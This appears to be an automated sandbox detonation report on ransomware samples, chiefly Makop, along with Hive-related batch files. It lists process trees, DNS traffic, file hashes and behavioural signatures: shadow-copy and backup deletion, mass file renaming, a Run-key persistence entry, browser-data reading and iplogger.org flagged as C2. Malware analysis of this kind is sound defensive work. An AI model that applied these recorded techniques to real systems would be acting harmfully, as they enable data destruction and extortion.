C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	8.8.8.8.in-addr.arpa	udp
US	8.8.8.8:53	133.211.185.52.in-addr.arpa	udp
US	8.8.8.8:53	240.143.123.92.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	8.8.8.8:53	68.159.190.20.in-addr.arpa	udp
US	8.8.8.8:53	g.bing.com	udp
US	204.79.197.237:443	g.bing.com	tcp
US	8.8.8.8:53	237.197.79.204.in-addr.arpa	udp
US	8.8.8.8:53	209.205.72.20.in-addr.arpa	udp
US	8.8.8.8:53	183.142.211.20.in-addr.arpa	udp
US	8.8.8.8:53	50.23.12.20.in-addr.arpa	udp
US	8.8.8.8:53	56.126.166.20.in-addr.arpa	udp
US	8.8.8.8:53	172.214.232.199.in-addr.arpa	udp
US	8.8.8.8:53	14.227.111.52.in-addr.arpa	udp
US	8.8.8.8:53	45.19.74.20.in-addr.arpa	udp

Files

memory/4344-0-0x0000000000690000-0x0000000000969000-memory.dmp

C:\$Recycle.Bin\S-1-5-21-2990742725-2267136959-192470804-1000\desktop.ini

MD5	1efa7a4ff08615c29e8b642f1b5059e0
SHA1	9919795fa66a06bfc1b7e6a7a51b2966a741f80c
SHA256	08b65110cbf178c66255a3ea9a22e3dd90e0da1e380a3c592e9044ac0fd3fc68
SHA512	c7ca1e6a08d90c14480abec92e74a652a1046587e9da103bc4c1734ff57024b82631741a2a1c7436779b848360eea632196a8112577951aaaeffdd5a7e6ded10

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat

MD5	6358d970c3edccb57eae7dbf9f42d58f
SHA1	25b994c3b5604f4f67e1ac6250bc2f14ce690380
SHA256	9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50
SHA512	44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat

MD5	df5552357692e0cba5e69f8fbf06abb6
SHA1	4714f1e6bb75a80a8faf69434726d176b70d7bd8
SHA256	d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8
SHA512	a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d

memory/4344-346-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-878-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-1121-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-1506-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-2638-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-3081-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-3517-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-3928-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-4316-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-4823-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-5729-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-6397-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-8184-0x0000000000690000-0x0000000000969000-memory.dmp

memory/4344-9381-0x0000000000690000-0x0000000000969000-memory.dmp

C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.xhylKSmuz5RNbZ6NUxzXXgzw-YBgsl0SbEc6JFIZfXQ.hive

MD5	6b87631b89ce2301b19e290520260b59
SHA1	cb3b46515d43ea1f79b2edccd45f5143244e129b
SHA256	7533bbeadd451eb9a2fb1d3280b415a4a7cc1b7610d5ca4b5b72b7c0ff3a5807
SHA512	088bd71dae75ef3f44b184950a540828319905de60a8c3276c49614e6ca642f3eb7cdc8af4761386a1260097fb9aae0388f8503cbe6128cacbd224af363ed674

memory/4344-10109-0x0000000000690000-0x0000000000969000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240709-en

Max time kernel

137s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

Signatures

Loads dropped DLL

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A

Enumerates physical storage devices

Program crash

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\WerFault.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 3728 wrote to memory of 756	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 3728 wrote to memory of 756	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 3728 wrote to memory of 756	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3728 -ip 3728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 948

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	8.8.8.8.in-addr.arpa	udp
US	8.8.8.8:53	196.249.167.52.in-addr.arpa	udp
US	8.8.8.8:53	240.143.123.92.in-addr.arpa	udp
US	8.8.8.8:53	4.159.190.20.in-addr.arpa	udp
US	8.8.8.8:53	57.169.31.20.in-addr.arpa	udp
US	8.8.8.8:53	28.118.140.52.in-addr.arpa	udp
US	8.8.8.8:53	157.123.68.40.in-addr.arpa	udp
US	8.8.8.8:53	171.39.242.20.in-addr.arpa	udp
US	8.8.8.8:53	240.221.184.93.in-addr.arpa	udp
US	8.8.8.8:53	14.227.111.52.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	8.8.8.8:53	205.47.74.20.in-addr.arpa	udp
US	8.8.8.8:53	10.27.171.150.in-addr.arpa	udp

Files

C:\Users\Admin\AppData\Local\Temp\nsa9F9C.tmp\System.dll

MD5	fccff8cb7a1067e23fd2e2b63971a8e1
SHA1	30e2a9e137c1223a78a0f7b0bf96a1c361976d91
SHA256	6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e
SHA512	f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c

Analysis: behavioral31

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:44

Platform

win7-20240705-en

Max time kernel

144s

Max time network

133s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

Signatures

Makop

ransomware makop

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (8323) files with added filename extension

ransomware

Deletes backup catalog

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\wbadmin.exe	N/A

Loads dropped DLL

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\MAKOP_27_10_2020_115KB.exe\""	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A

Enumerates connected drives

Description	Indicator	Process	Target
File opened (read-only)	\??\F:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A

Legitimate hosting services abused for malware hosting/C2

Description	Indicator	Process	Target
N/A	iplogger.org	N/A	N/A
N/A	iplogger.org	N/A	N/A

Suspicious use of SetThreadContext

Description	Indicator	Process	Target
PID 2052 set thread context of 1888	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1960 set thread context of 2548	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2356 set thread context of 2676	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

Drops file in Program Files directory

Description	Indicator	Process	Target
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00095_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\readme-warning.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\FAXEXT.ECF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\STRBRST.POC	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_ButtonGraphic.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185828.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_on.gif	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\SLERROR.XML	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
File opened for modification	C:\Program Files\DVD Maker\de-DE\OmdProject.dll.mui	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe	N/A
